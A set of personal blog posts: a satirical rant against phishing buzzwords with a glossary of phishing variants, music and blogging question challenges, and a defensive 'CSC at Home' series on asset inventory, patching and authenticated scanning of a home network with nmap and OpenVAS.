But then, a few years ago, Coinbase dropped their infamous QR Code Super Bowl ad and every single infosec influencer and security vendor had a “Quishing” article out within 24 hours. Ugh. I distinctly remember complaining about this a few years ago, but I ultimately let it go. But today, I came across this extremely cursed blog post from Zimperium, titled “Hidden in Plain Sight: PDF Mishing Attack”. No! *whacks Zimperium blogger with rolled-up newspaper* - STOP.

First of all, this wasn’t even their first usage of the “term” (know that I’m using those quotes very sarcastically) Mishing. To understand it, you have to go back to this post where they explain that mishing is some sort of composite form of phishing which includes a bunch of other established phishing variants (e.g. vishing, smishing, quishing, etc…) What? So it isn’t even its own thing? Why does this need to exist? Let me answer that. It doesn’t. It shouldn’t.

What’s wrong with just using a descriptive, distinct word as a prefix for different types of phishing variants? Y’know, like “Spear Phishing”. There are plenty of other examples of how we’ve done this in sane way, e.g. Angler phishing, Clone Phishing, double-barrel phishing, Deepfake phishing, search engine phishing, etc… Now granted, I don’t love these either, but imagine if those who had coined these terms had instead gone with things like (respectively) “angishing”, or “clishing”, or “dubba-ishing”, or “deepishing“… *shudders*. You see how ridiculous that sounds? I’d even settle for coming up with a completely new term, like what we did with “Whaling” or Pharming. At least there’s some points for creativity. But no, Zimperium thought they could play God, and breathe life into this abomination.

Look, I think coming up with funny names for stuff is great. I mean I’ve been documenting named vulnerabilities for over 5 years now and will continue to do so. It’s whimsical and fun. Name every vuln for all I care. As for the -ishings though?…

I won’t stand for it. I’m going to use my platform, and what influence I have (and I can’t emphasize enough how little that probably is), to stir collective action. No more -ishings. We must band together. Take the pledge, sign the petition (yes, this is a real and totally not satirical petition on change.org), get the word out, don’t breathe further life into these terms, don’t legitimize them in any way. I call them out here only to shame them and the would-be influencers-turned-pariahs who were responsible for their creation. I hope you’ll join me.

Because if we don’t do something now. Who knows what the future will look like. Think you have it hard now with all the terms and acronyms you have to remember? It could be a lot worse.

All this said, you might be unfortunate enough to have to remember what all these terms mean. For that, you can look at my very cursed Glossary of -ishings. God speed.

Glossary of -ishings

Don’t know what the hell “Mishing” is? Don’t worry, no one should have to. But here you are anyway. Learn what allllllllll the different -ishings are below…

First though, to understand all derivatives, let’s define regular-ol’ “Phishing”. I’m just going to use Wikipedia’s definition for Phishing here as I think it sums it up nicely enough.

Phishing is a form of social engineering and a scam where attackers deceive people into revealing sensitive information or installing malware such as viruses, worms, adware, or ransomware.

Good. Now, the -ishings…

“Vishing”: Phishing using your voice. So like, over the phone as an example. Seems like we could have just left this as “Voice Phishing”.
“SMiShing”: Phishing through text messages. Notice how officially this term has capitalized the first ‘S’, the ‘M’ and the second ‘S’ so that it spells out “SMS”. I bet whoever came up with that was real proud of themselves. Lame. Oh and yeah, seems like we could have just called this “SMS Phishing”.
“Quishing”: Phishing with QR codes. Put a QR code on something, people just run around scanning QR codes all the time right? Unaware, they are teleported off to a malicious website or whatever. JUST CALL IT QR PHISHING. Jeez.
“Mishing”: “Mobile-targeted” phishing (according to Zimperium). Just go look at the link, as it explains it better than I honestly care to do here. I’ve made my feelings quite clear about this particular term. I will say no more.

To finish this off, I’ll drop some quick definitions for the other -ishing-adjacent terms…

“Spear Phishing”: A phishing campaign that is highly targeted at a single person or group.
“Whaling”: A spear phishing variant aimed exclusively at high-level executives or important officials.
“Angler phishing”: Phishing targeting users’ social media accounts.
“Clone Phishing”: A type of email phishing where the malicious actor imitates (“clones”) emails from authorized senders.
“Double-barrel phishing”: Sending two separate emails to a victim to establish trust and lend authenticity.
“Deepfake phishing”: Leveraging deepfakes to phish someone. Basically deepfaking your voice, writing style, visage, etc…
“Search engine phishing”: i.e. SEO poisoning, is where a malicious actor coerces a search engine to elevate a malicious phishing link in search engine results.
“Pharming”: Hijacking DNS to redirect users to a malicious site. (Seems kinda similar to DNS spoofing/poisoning etc no?)
“Chainlink Phishing”: Chaining together multiple legitimate tools to bypass traditional defenses

Know of another -ishing term I haven’t captured here? KEEP IT TO YOURSELF. I really don’t want to know about any more.

Hopefully I was able to adequately channel my inner-CrankySec. Sorry you had to read this!

Music Questions Challenge

Tue, 04 Feb 2025 08:47:00 -0500

The latest in the IndieWeb community’s blog challenges is the Music Questions Challenge. Similar to the last blogging challenge I did, it consists of a series of questions that I’ll answer throughout.

I got the idea from Flamed Fury & The Shrediverse (though no one “tagged” me, I’m goin’ for it anyway).

Music Challenge Questions

Here are the 10 questions that make up the “Music Questions Challenge”.

What are five of your favorite albums?
What are five of your favorite songs?
Favorite Instrument(s)?
What song or album are you current listening to?
Do you listen to the radio? If so, how often?
How often do you listen to music?
How often do you discover music? And how do you discover music?
What’s a song or album that you enjoy that you wish had more recognition?
What’s your favourite song of all time?
Has your taste in music evolved over the years?

What are five of your favorite albums?

I recently wrote about my “Zero-skip albums”, but though I like each song on those albums, that doesn’t necessarily make them my favorite. Though there is plenty of cross-over between that list and the one below. Here’s my five favorites (in no particular order)…

Hybrid Theory, Linkin Park: THE formative music for me. I still love it the same as I did in like middle school.
A Night at the Opera, Blind Guardian: If you like power metal (and you should), this is the band you should listen to. This album is haunting and beautiful.
In Keeping Secrets of Silent Earth: 3, Coheed and Cambria: First heard this in highschool. Coheed is one of my favorite artists of all time and this is my favorite of their albums.
Jackpot Juicer, Dance Gavin Dance: I love every song on this album just-about. It’s one of my go-tos for working out too.
Close to the Edge, Yes: I went through a big Yes phase around my college years. This album was on constant repeat. I don’t listen to it nearly as much nowadays, but it forever remains in my top albums list.

Some honorable mentions…

The Yes Album, Yes
Us Against the Crown, State Radio
Gravity, Our Lady Peace
Happiness…Is Not a Fish That You Can Catch, Our Lady Peace
Deloused in the Comatorium, The Mars Volta
Treehouse, I See Stars
Believe, Disturbed
Random Access Memories, Daft Punk
The Afterman: Descension, Coheed and Cambria
No World for Tomorrow, Coheed and Cambria
Good Apollo I’m Burning Star IV, Coheed and Cambria
Saturate, Breaking Benjamin
Make Yourself, Incubus

What are five of your favorite songs?

Ooph, choosing just five is tough. But here goes… (will save my #1 favorite for later, so there’s a bonus here.)

No Leaf Clover, Metallica
In Keeping Secrets of Silent Earth: 3, Coheed and Cambria
Civil War, Guns & Roses
And Then There Was Silence, Blind Guardian
Close to the Edge, Yes (The Yessongs Live version)

Favorite Instrument(s)?

I guess probably guitar.

What song or album are you current listening to?

Most recently I’ve been listening to the Weeknd’s new album, Hurry Up Tomorrow. But since writing this piece I’ve been listening to various of my favorites listed throughout this piece. At this exact moment, I’m listening to Close To The Edge.

Do you listen to the radio? If so, how often?

Nope. Though I do listen to Apple Music “radio stations” from time to time to discover new music.

How often do you listen to music?

Every day, multiple times a day. I’ll listen to music while I work, while I clean up around the house, and (loudly) when I work out.

How often do you discover music? And how do you discover music?

Not as often as I should. I go through spurts of discovery a few times a year at best. I primarly discover music through Apple Music stations that I create based on other music I like. Though I’ve been increasingly discovering music via social media. Shoutout to @jcrabapple!

What’s a song or album that you enjoy that you wish had more recognition?

This is an interesting question for me. Honestly I don’t have a great sense of what songs/albums/artists have what recognition. The album From One by Ra is amazing and I really have never heard of anyone talk about this artist before. Go listen to it!

What’s your favourite song of all time?

This one was painfully tough. But I gotta go with Stairway.

Has your taste in music evolved over the years?

In some ways yes, in other ways eh… I have a huge music library and enjoy a lot of different things. But when it comes to music I actually put on and listen to, my taste has been the same for a decent while now. I previously wrote about music that is particularly nostalgic for me, but this doesn’t necssarily reflect all I was listening to throughout the years. An attempt to “sum up” my music taste(s) throughout the years is below…

Pre-High School: Linkin Park, Papa Roach and similar stuff.
High School: Coheed and Cambria, In Flames, other death metal, Led Zeppelin, Lots of classic rock
College: Yes, State Radio
Post-College-Now: I find myself listening to a lot of rock and metal, so pretty similar to how it’s always beeen. Notably less classic rock in my routine listening fwiw.

Next up, I challenge/tag CMDR Nova & Apis Necros!

Get To Know My Blog

Wed, 15 Jan 2025 15:02:00 -0500

The gauntlet was thrown, and I’ve answered. Get to know a little bit more about my blog as I answer these 8 questions. (Courtesy of The Hive)

Blog Challenge Questions

Here are the 8 questions that make up the “Blog Questions Challenge”

Why did you start blogging in the first place?
What platform are you using to manage your blog and why did you choose it?
Have you blogged on other platforms before?
How do you write your posts? For example, in a local editing tool, or in a panel/dashboard that’s part of your blog?
When do you feel most inspired to write?
Do you publish immediately after writing, or do you let it simmer a bit as a draft?
What’s your favourite post on your blog?
Any future plans for your blog? Maybe a redesign, a move to another platform, or adding a new feature?

Why did I start blogging?

I’ve talked about this here. Basically, I had a good idea or two of things to write about, and thought maybe more things would come…

Better question is why do I keep blogging. So many reasons!

What platform am I using?

I cover this in my /architecture page! Honestly, I think the reason I chose GitHub Pages + Jekyll was that it was easy and the first thing I came across that seemed easy. I had tried (and failed) to stand up a blog in the past. I needed something low-effort, that would allow me to just write and publish. If I was setting something up today, would I still choose Jekyll+GH Pages? I actually might. It’s been really great to be honest. But there are a lot of great options I’d also consider.

Have I blogged on other platforms?

Barely. At one point I owned the “techfari.com” domain and wrote one post on Medium. I forget what it was even about.

How do I write my posts?

I’ve published a few things about how I write…

A Multiplicity of Writing: A look at the different types of content I publish here.
My blogging methodology
My process for writing when I was a little more iPad-forward
I’ve discussed how I write in my architecture page too
Finally, perusing my /uses page will give you a pretty good understanding of my setup and what I use to do what I do

But in short, as of right now, I write everything in VSCode.

When do I feel most inpsired?

Honestly I think it’s in moments like these, when I am writing in response to something. Maybe i’m commenting on another blog post, or maybe it’s in response to a thread I’ve seen elsewhere, or a question someone has asked. In those pieces, what I write has a purpose.

Do I publish immediately?

Pretty much. I don’t like to spend time writing something only to have it sit and waste away. I always reserve the right to delete, or update things I’ve published. In fact, updating/adding stuff to existing posts is something I do all the time. I consider very little of what I write to be true point-in-time thinking. Instead, these are all resources to me (and maybe others), so I want things to be updated with the latest and greatest facts and thoughts.

What’s my favorite post on my site?

Great question. Tough one. Really hard to pick for me. I’d say my favorite blog post is “The Enchiridion of Impetus Exemplar”, my threat modeling compendium. I use it as a resource for myself all, the, time. But I love so much about my site, it’s very uniquely me. It’s filled with all sorts of oddities that I honestly love equally. Another page I particularly like is my Activity Feed page.

Do I have future plans?

Of course I do! I’ve (unsurprisingly) documented a lot of my future plans, hopes, dreams, etc… in various places on my site…

Roadmap
Ideas
“Future items”
Various yearly resolutions

If you’re reading this and have a blog, why not answer these questions yourself! If you don’t, maybe it’s time you start one 🤗.

CSC at Home (Part 3): Vulnerability Management

Mon, 13 May 2024 09:14:00 -0400

Welcome to part 3 of the CSC at Home series where I provide practical guidance on how one could implement the CIS Top 20 controls in their home or small-business environment.

This post, as part of a 3-part series are all pieces I had sitting in my drafts folder since the beginning of 2021. As such, they cover a version of the CIS Critical Security Controls that is rather old at this point. Still, I thought the content relevant and interesting enough to publish (as-was), even after all these years. Let me know what you think!

CIS Control 3: Continuous Vulnerability Management

CIS Control 3 is Continuous Vulnerability Management, proactively identifying and addressing vulnerabilities across the systems in your environment on a continuous basis. The sub-controls for IG-1-class organizations related to this control are listed below. Specifically, these sub-controls are 3.4 and 3.5. Also included in the list below are controls 3.1 and 3.2 which ask that automated vulnerability scanning is performed and that these scans are run as credentialed scans. I’ve included these two additional controls as I consider them to be that important, even for small organizations. Not only do I consider these extra two controls important, but I believe they are trivial to perform given you have successfully achieved the first two controls.

*Sub-Control 3.1: Run Automated Vulnerability Scanning Tools
*Sub-Control 3.2: Perform Authenticated Vulnerability Scanning
Sub-Control 3.4: Deploy Automated Operating System Patch Management Tools
Sub-Control 3.5: Deploy Automated Software Patch Management Tools

Security Value

Software and firmware are constantly being updated by their respective vendors. The focus of many of these updates are not feature improvements, rather they are security fixes. No further elaboration is needed, it’s always a good idea to apply security fixes when they become available. To aid in finding missing patches as well as other security flaws such as misconfigurations, we have vulnerability scanners. Sub-control’s 3.1 and 3.2 ask that you scan systems in your environment in an automated, routine and credentialed fashion. Credentialed scans will yield the most comprehensive and high fidelity results, and performing this type of scanning on a frequent automated basis will help ensure that as new vulnerabilities or misconfigurations crop up, they are dealt with with the shortest possible dwell time.

Deploy Automated Operating System Patch Management Tools (Sub-Control 3.4)

Sub-control 3.4 asks that an organization deploy automated software update tools. This section will briefly explain how this can be done for both Windows and Linux operating systems.

Windows OS Updates

For Windows systems, a popular PowerShell module exists which allows easy automation of Windows updates. This module is called PSWindowsUpdate. The only requirements for running this PS module is that the host OS be at-least Vista or Server 2008 and that it is running PowerShell 2.0 or later. For an introductory guide to automating Windows updates using this module, check out the following article.

How to Automate Windows Updates Using PowerShell: Short Overview

Linux OS Updates

Similarly on Linux, it is easy enough to deploy automated patching. The UnattendedUpgrades package does exactly this! Please reference the guide below for additional help with installation and configuration of this package for automatic OS updates.

AutomaticSecurityUpdates

Deploy Automated Software Patch Management Tools (Sub-Control 3.5)

Sub-control 3.5 asks that an organization deploy automated software update tools in order to ensure that operating systems are running the most recent security updates provided by the software vendor. How this can be accomplished for both Windows and Linux systems is described in greater detail below.

Windows Software Updates

Windows doesn’t come with a native software package manager like Linux systems. By default, keeping any given piece of software up-to-date on your system requires that for each piece of software, a setting is enabled which allows for automatic installation of new updates from that respective vendor. With this said, a package manager for Windows does exist and can be installed in order to better facilitate automated and centralized software management. For this, I recommend the package management software “Chocolatey”. Installing Chocolatey is as simple as running a few commands in a PowerShell terminal! From here, there are step-by-step guides for doing all things the Chocolatey way.

Linux Software Updates

The UnattendedUpgrades module introduced in the section “Linux OS Updates” is all that is needed to also manage automated software updates in Linux.

Run Automated Vulnerability Scanning Tools (Sub-Control 3.1)

Sub-control 3.1 asks that all systems on the network be automatically scanned on at least a weekly basis to identify potential vulnerabilities.

Perform Authenticated Vulnerability Scanning (Sub-Control 3.2)

Sub-control 3.2 asks that vulnerability scans that are performed are done as authenticated (a.k.a. “credentialed”) scans.

Previously in the Series

The previous chapter in the CIS at Home series covers Control 2: Inventory and Control of Software Assets.

CSC at Home (Part 2): Software Inventory and Control

Sun, 12 May 2024 09:00:00 -0400

Welcome to part 2 of my CSC at Home series where I provide practical guidance on how one could implement the CIS Top 20 controls in their home or small-business environment.

CIS Control 2: Inventory and Control of Software Assets

The second CIS control is reminiscent of the first. Rather than hardware inventory however, this control deals with the inventory and control specifically of software. The relevant sub-controls for an Implementation Group 1 (IG1) environment are listed below.

Sub-Control 2.1: Maintain Inventory of Authorized Software
Sub-Control 2.2: Ensure Software is Supported by Vendor
Sub-Control 2.6: Address Unapproved Software

Security Value

Maintenance and routine audit of installed software is key to a secure environment. For each piece of installed software, there is added potential for vulnerability due to increased attack surface. The first step to securing your network is to understand what is on the network, and the first step to securing any individual system on that network is to understand the software that is installed on that system. Subsequently, software should be evaluated to determine whether it is still in active support by the vendor and finally, any unapproved software should be removed from the system. If software is no longer in support by the vendor, it will likely not receive future security updates and therefore may pose a more serious risk to the system. Unauthorized software may be malicious in nature or pose inadvertent risk to the system.

Maintain an Inventory of Authorized Software (Sub-Control 2.1)

Let’s start with sub-control 2.1 which asks that we maintain an up-to-date list of all authorized software. This inventory can be thought of as a “whitelist” - anything not on this list is considered unauthorized and therefore should be removed from the system. To create this whitelist, we need to interrogate the systems on the network for what software is currently installed. A network scanning tool such as OpenVAS or Nessus can do just that!

In the first part of this series I went over the steps for getting up and running with OpenVAS. Take a look at these steps and then follow along with the steps below.

OpenVAS Authenticated Scanning

To enumerate software on an endpoint, we will need to be able to authenticate to that endpoint from our scanner. For Linux devices, this means authentication over SSH and for Windows, over SMB. Linux servers will typically have a listening SSH service but if not, it is trivially installed on Linux with the following command.

sudo apt install openssh-server

You can validate the server is enabled and listening as shown below.

To get started with authenticated scanning using OpenVAS we need to first create a new Credential. This can be done by going to Configuration–>Credentials. Just give it a name, select the type of credential and input the username and password. For SSH, username and password will work, though key-based auth is recommended. Similarly for Windows, a username and password can be created. It is also recommended that service accounts (a non-user account) are created for scanning purposes. This way, the scanner can easily be configured with this service account for authenticating to remote machines.

Once we have a credential, let’s create a new Target list. Navigate to Configuration–>Targets and then create a Target and associate the credential you just created.

TIP: You can associate more than one credential with a target list.

Now that we have a Target with associated credentials, we can create a new Scan by going to Scans–>Tasks and creating a new Task with the Scan Targets as the newly created target and the Scan Config being set to “Full and fast”. Be sure to give the scan task a useful Name.

With the scan task created, we can run the it! Give it some time to finish.

TIP: Authenticated scans typically finish quicker than unauthenticated scans. This is because the act of local enumeration is much more efficient than remote fingerprinting.

Once the scan finishes, click on the “Done” area of the scan record to view the report. Inside this report (once the default filters have been removed), you can see the results, hosts, ports, etc… The tab of interest for software inventory is the “Applications” tab. In here, we can see a list of Application CPE values. In this list we can not only see the list of applications, but also the installed versions of those applications. Awesome! We now have an inventory of software for this system.

This list should be evaluated for each scanned system to determine if any of the software is “unauthorized” and should therefore be removed from this system and any other system that the software is on. If there are known vulnerabilities with any specific piece of software, this will show up in the “findings” tab of the scan report and should be addressed for that reason as well.

Troubleshooting Authenticated Scanning

There are a number of issues you may encounter when configuring and running authenticated scans with OpenVas. With both Linux and Windows, you will want to make sure the account you are authenticating as has proper permissions on the remote system. This means having root (or sudo) privileges on Linux and Administrator privileges on Windows. For Windows systems, there are a few additional things you will want to ensure are enabled prior to scanning.

File and Printer Sharing must be enabled within the Windows Firewall settings.
Allow inbound file and printer exception setting within local group policy must be enabled.
The setting “Prohibit use of Internet connection firewall on your DNS domain” must be set to Disabled in the systems local group policy.
The Remote Registry service must be enabled.

Some additional resources for troubleshooting authenticated scans are provided below.

Ensure Software is Supported by Vendor (Sub-Control 2.2)

When software becomes end-of-life, this means the vendor does not intend on releasing security patches for that respective piece of software. When new vulnerabilities are discovered, these risks will go unaddressed and the security posture of your environment will be degraded. The software list we generated in the previous sub-control should be regularly reviewed to determine whether any individual item is no longer supported by the vendor. The software inventory includes version numbers which can be used to help facilitate this task.

Address Unapproved Software (Sub-Control 2.6)

When software is identified, via scanning operations, that is not explicitly “approved”, it should be removed from a system. A technical control for implementing this concept is “Application Whitelisting”. Application whitelisting is essentially a piece of software that enforces what other software is allowed to be installed on a system. Any item that is not on the whitelist will be blocked from being installed. New software items can be added with business justification. Application whitelisting on Linux can be achieved through the File Access Policy Daemon. On Windows, AppLocker can be used for software whitelisting. Here’s another great and very technical guide series for standing up AppLocker.

The Automation Dilemma

Inventory and control of software assets for an IG1-class organization comes down to three things…

Maintain an inventory of authorized software.
Ensure software is supported by the vendor.
Address unapproved software.

Achieving these three things is made much easier through the use of automation. The community version of OpenVAS has some limitations when it comes to automating via the GSM API. Without automation, a lot of the work described above is manually performed, week after week. At a small scale (which is the case with IG-1 environments) this may not require too much work but as the network grows in size, so too will the work required to achieve proper software inventory and control. This is where automation steps in.

Next in the Series

Thanks for reading! The next chapter in the CIS at Home series covers Control 3: Continuous Vulnerability Management.

Previously in the Series

The previous chapter in the CIS at Home series covers Control 1: Inventory and Control of Hardware Assets.

CSC at Home (Part 1): Hardware Inventory and Control

Sat, 11 May 2024 09:26:00 -0400

This is the first in a series of posts discussing the CIS Top 20 controls and how they can be implemented in a home or small-business environment. Before getting into the first of these controls, I’ll begin by providing some introductory background on the CIS Top 20.

CIS Top 20

The CIS Top 20 controls, published and maintained by the Center for Internet Security (CIS) are in essence, a prioritized set of actions, that when implemented, improve the security posture of your IT environment. The CIS Top 20 was developed by a community of experts and is a well-known and oft-used framework in both the public and private sector. It focuses on all aspects of cybersecurity including identification, protection, detection, response and recovery (these pillars of cybersecurity are described further in NIST’s CSF). These 20 high-level controls are further broken into smaller sub-controls which more granularly detail how the goals of the parent control are met. It’s important to stress the prioritized nature of these controls. They are meant to be implemented in order. Implementing control 2 for example, would be fraught without first completing control 1.

The current version of the CIS controls (at version 7.1) details how organizations of varying capabilities and resource capacities can best implement the CIS controls. This concept is built into the framework using the idea of “Implementation Groups”, of which there are 3 (“IG1”, “IG2” and “IG3”). CIS describes an IG1 (“Implementation Group 1”) organization as “A family-owned business with ~10 employees”. I would consider an IG1 organization as a home-network or small business with little to no dedicated security funding and minimal (or zero) dedicated cybersecurity personnel.

CIS also breaks down the 20 controls into three distinct groups, “Basic”, “Foundational” and “Organizational”. The initial group, “Basic”, includes the first 6 controls. The subsequent groups contain the next 10 and the next 4 controls respectively. Through this series, I will focus on how an IG1-class organization (such as a small business or simply a home network) can implement these CIS controls.

As the write-ups for each control are published, they will be made available in this list below.

Basic

Control 1: Inventory and Control of Hardware Assets
Control 2: Inventory and Control of Software Assets
Control 3: Continuous Vulnerability Management
Control 4: Controlled Use of Administration Privileges
Control 5: Secure Configuration for Hardware and Software
Control 6: Maintenance, Monitoring and Analysis of Audit Logs

Foundational

Control 7: Email and Web Browser Protections
Control 8: Malware Defenses
Control 9: Limitation and Control of Network Ports, Protocols and Services
Control 10: Data Recovery Capabilities
Control 11: Secure Configuration for Network Devices, such as Firewalls, Routers and Switches
Control 12: Boundary Defense
Control 13: Data Protection
Control 14: Controlled Access Based on the Need to Know
Control 15: Wireless Access Control
Control 16: Account Monitoring and Control

Organizational

Control 17: Implement a Security Awareness and Training Program
Control 18: Application Software Security
Control 19: Incident Response and Management
Control 20: Penetration Tests and Red Team Exercises

CIS Control 1: Inventory and Control of Hardware Assets

For small organizations, the first control is as simple as the name - maintain an up-to-date inventory of your hardware, and implement some control over how that hardware accesses your network. For IG1-class organizations, the relevant sub-controls are as follows.

Sub-Control 1.4: Maintain Detailed Asset Inventory
Sub-Control 1.6: Address Unauthorized Assets

Security Value

They say “you can’t protect what you don’t know you have”. This control is the embodiment of that phrase and as it applies to IT security, it makes a lot of sense. Computers and other IT systems don’t typically come secured out of the box. It takes careful configuration and often times installation of additional software and tools to properly secure most systems. This emphasizes the need to recognize all devices on the network so that they may be actively secured. Maintaining an accurate inventory will help system owners dedicate the proper attention to each device on the network.

In addition to knowing what is on your network, it is also recommended to control what devices are allowed on your network. If you are configuring a new device, you may not want it to have full network access until it is fully and completely secured. We also need to monitor the environment for devices which we do not own and have somehow been given unauthorized access to the network. These “rogue devices” are potentially dangerous and must be identified and then removed or quarantined.

Maintain Detailed Asset Inventory (Sub-Control 1.4)

Let’s start with sub-control 1.4 which asks that we maintain an accurate and up-to-date inventory of all technology assets with the potential to store or process information. The sub-control goes on to say that this inventory shall include all assets, whether connected to the the organization’s network or not. In terms of the inventory, it’s a good idea to understand for each system, what it’s purpose is, the data it processes and who owns it.

A proven method for identifying network-resident hosts is to perform discovery scanning. For this, I trust good ol’ NMAP! Before we begin scanning however, it’s good to have as much of an understanding of the target network as possible. Having a pre-existing network topology/diagram would be a good place to start. With this in hand you can understand if the network is hierarchical/segmented in nature or flat. Knowing this will help you better discover assets across your network. Of course, not everyone has a documented network diagram on-hand, so instead… Assuming a flat network, first find the IP of one system and begin scanning the network it resides on.

TIP: With segmented/hierarchical networks, you may need to whitelist your scanning devices on the firewalls themselves so that scan traffic may freely traverse the different network segments.

NMAP

Let’s get started with discovery scanning using NMAP. Run an ‘ifconfig’ or ‘ipconfig’ (depending on the OS of your host system), determine your IP address and then start with the following discovery scan. For help installing NMAP, reference the nmap.org site.

sudo nmap -sn 192.168.1.0/24 -n --traceroute -oA discoveryresults

Quickly running through the command parameters here…

sudo: This nmap command needs to be run as root since it needs to create raw sockets for sending ICMP packets.
-sn: This is the discovery flag which limits nmap probes to ICMP and TCP-based pings.
192.168.1.0/24: If your systems are on the 192.168.1.0/24 Class-C network, this would be a good place to start. Alternatively, your network may house systems with IPs in a different internal (RFC-1918) network range, such as 10.0.0.0/8. Be warned though! /24 (Class-C) networks may only have 256 potential addresses, but class B and class A networks have ~65 thousand and ~16 million IPs respectively. Scanning these would take considerable time. Be sure to input a network subnet here that best fits your target network.
-n: Disables DNS resolution.
–traceroute: This may help better understand network topology via a traceroute
-oA discoveryresults: Finally, save the results of your scan into different formats for later processing in a file named “discoveryresults”.

Once the scan has finished (this may take considerable time depending on the size of the network you are scanning - feel free to increase scan speed using the command flag ‘-T5’ which is the max speed that can be chosen), we look at the results and begin the inventory process. Primarily, we want to understand the following…

How many devices did we find?
Do we know of anything we missed?
Of the devices we found, what are they? (e.g. Servers, Workstations, Operating System, etc…)
Who is the owner of the devices we found?

The ping scan returns some helpful inventory-related information in addition to simply whether a system was found “live” on the network. Namely, the MAC address for each system is found and with this mac address, NMAP can hint at what that device may be as MAC addresses map back to specific manufacturers.

Nmap scan report for 192.168.1.6
Host is up (0.81s latency).
MAC Address: 64:52:99:A7:7F:D8 (The Chamberlain Group)

As can be seen in the NMAP output above, based on the MAC address of this discovered system, the owner is likely “The Chamberlain Group”. I now know that this is my smart garage door controller. Neat!

OpenVAS

NMAP is a great tool, and it is a great place to start when first doing discovery scanning on your network. However, without considerable extensions to basic functionality, NMAP is not the ideal solution for maintaining an enterprise-grade hardware asset inventory. For this, one could instead turn to a more feature-filled “Vulnerability Management” tool and full-featured scanner such as OpenVAS or Nessus.

OpenVAS, originally “GNessUs” began as a fork of the previously open-source Nessus tool. Once Tenable took Nessus proprietary, OpenVAS continued to be maintained as an open-source alternative. Since then, its maintainers, Greenbone Networks have continued to develop OpenVAS as part of its larger vulnerability management product known as Greenbone Security Manager or “GSM”.

NOTE: I will likely use the terms “GSM” and “OpenVAS” interchangeably.

OpenVAS Installation & Usage

To get started with GSM, Greenbone offers a free “trial” (the trial has some functionality limited compared to the fully-licensed version) via the downloadable Greenbone Security Manager Virtual Appliance. This virtual appliance can be spun up using virtualization software such as VirtualBox or VMware. In the spirt of free and open-source, Greenbone provides detailed installation instructions for getting up and running with GSM inside VirtualBox. To get started, simply download the virtual appliance!

Once you have the GSM up and running (I recommend following the install guide from GreenBone), log into the web interface.

To configure your first discovery scan, first go to Configuration–>Targets (on the main dashboard) and create a New Target (using the button in the top left). Unlike with NMAP, GSM will be unable to scan an entire /16 network range, /24 is the highest it can go. Given this limitation, using NMAP to first discover systems on the wider network and then creating targets in OpenVAS which map to the class C subnets found in NMAP would be the best approach. Conversely, rogue-device scanning (covered later in control 1.6) is probably best done with NMAP. Alternatively of course, you could configure 250+ targets in OpenVAS for each class C within the larger class B but that is likely well beyond what you will need. With my network, I stuck with the 192.168.1.0/24 (class C) network and I left every other field in this Target wizard as the default value.

With that Target created, we can then go to Scans–>Tasks and click the “New Task” button in the top left. In this form, input a name (like “Discovery Scan” for example), set the scan targets using the drop-down menu to the Target object you created in the previous step and then set the “Scan Config” drop-down field to “Base”. All other fields can be left default for now. Click save.

TIP: The “Base” scan (as opposed to the “Discovery” scan template) performs the minimum set of actions required for host-discovery within OpenVAS.

Once saved, the scan can be run by clicking the play button on the Tasks main page (on the line where the new task was created).
Now sit back, grab a quick snack or a cup of coffee and let the scanner do its thing! …

Once finished, navigate back to the Scans–>Tasks pane, click on the link for the completed scan and then click on the blue status icon “Done”. Once inside the scan results, click the “Results” tab and click “Remove all filter settings”.
You can then click over to the “Hosts” tab and see all the devices discovered! Further, you navigate to the “Operating Systems” tab to see a breakdown of all the devices found and what Operating System OpenVAS has determined that each device is running.

Congrats, you now have a starting hardware inventory for network-connected devices. Now let’s take a closer look at what we found.

As seen below, I found 27 unique hosts on my network. Great. Based on my previous understanding of the network, do I believe there is anything missing from this list? If so, I may want to troubleshoot why the scanner did not find it. Perhaps the missing device is behind a firewall that my scanner couldn’t traverse? Does the system in question deny ICMP and/or TCP-based pings? Was the device off the network at the time of the scan? These are a couple of good questions to ask.

Going a little deeper now… What exactly are the devices we found with our scan? As I mentioned, scanners like NMAP and OpenVAS have some foot-printing capabilities to help you determine what Operating Systems a device is running or who the device manufacturer is. By clicking into an IP Address found in the “Hosts” tab, you can see additional details on individual systems. This will include a “Common Platform Enumeration” (CPE) value which suggests a likely OS for the respective system.

Finally, a good practice for maintaining a hardware inventory is to understand, for each identified system, who the owner is. For home network environments, this may be easy to figure out. For small business organizations, it may require manually interviewing potential system owners to determine who owns what. Knowing what the device is, what OS it runs and other types of information can help you narrow down who the potential owner may be. Once you have this information, or as you find out this information, you can tag assets in OpenVAS with the owner (or any other metadata you find valuable). To do this, go to Configuration–>Tags, create a new tag, give it a name, such as “Owner”, a value of the owner name and the Resource Type “Host”. From there you can select discovered Resources from the dropdown to associate with that tag. As new devices are discovered, be sure to assign them a tag. If you can’t figure out what a device is, further investigation is required to determine if it is an authorized device or not.

TIP: I recommend creating a tag called “Authorized” (or something similar) and assigning all hosts that tag which have been vetted as an authorized device. This way, as new devices come in, they can easily be identified as new and the vetting process can proceed.

TIP: For more on how to get the most out of OpenVAS check out the full documentation of Greenbone Networks GSM.

Address Unauthorized Assets (Sub-Control 1.6)

The second fundamental concept of CIS control 1 is that of Hardware Control - keeping unauthorized devices OFF your network. The security value of this control is relatively self-explanatory. Having unauthorized devices communicating on the network and potentially taking malicious actions would certainly have security-related consequences. Ideally, hardware control is achieved via a full-featured Network Access Control (NAC) solution. In a more simplistic implementation, enabling something like “MAC Address Filtering” would be an alternate technique for keeping unwanted devices off your network. This control however can be bypassed with relative ease for a dedicated attacker as MAC addresses are trivially spoofed. The idea behind MAC address filtering is to white-list certain MAC addresses and any that do not fall within that whitelist will not be allowed to access the network. NAC takes this idea further by implementing additional checks that a system attempting to access the network would need to pass to then be granted access.

Rogue-Device Scanning

In the absence of a true preventative network access control we can instead turn to a detective measure. The goal of rogue-device scanning is to identify assets on your network that shouldn’t be there or are not authorized to be on the network. One common way of performing this sort of scanning is to simply scan the entire internal network address space with something like NMAP. This scan can be run routinely (for example weekly) to regularly audit your network for rogue devices. One weakness of this approach is that if a device pops on the network for only a short period and then goes offline, your scan will be unlikely to catch it. To capture these more temporal rogues, doing some network traffic capture and analyzing that data is a good way to monitor for rogues. This type of scanning can be done using NMAP or OpenVAS.

More To Come On Hardware Control…

I’d like to re-visit this sub-control as part of a further chapter in this CIS-at-home series.

Additional CIS Control 1 Resources

The community (free) version of Nessus is a great alternative to OpenVAS but has limitations unless you buy a pro license. - Nessus Essentials

Next in the Series

Thanks for reading! The next chapter in the CIS at Home series covers Control 2: Software Inventory and Control.

Blogging Methodology

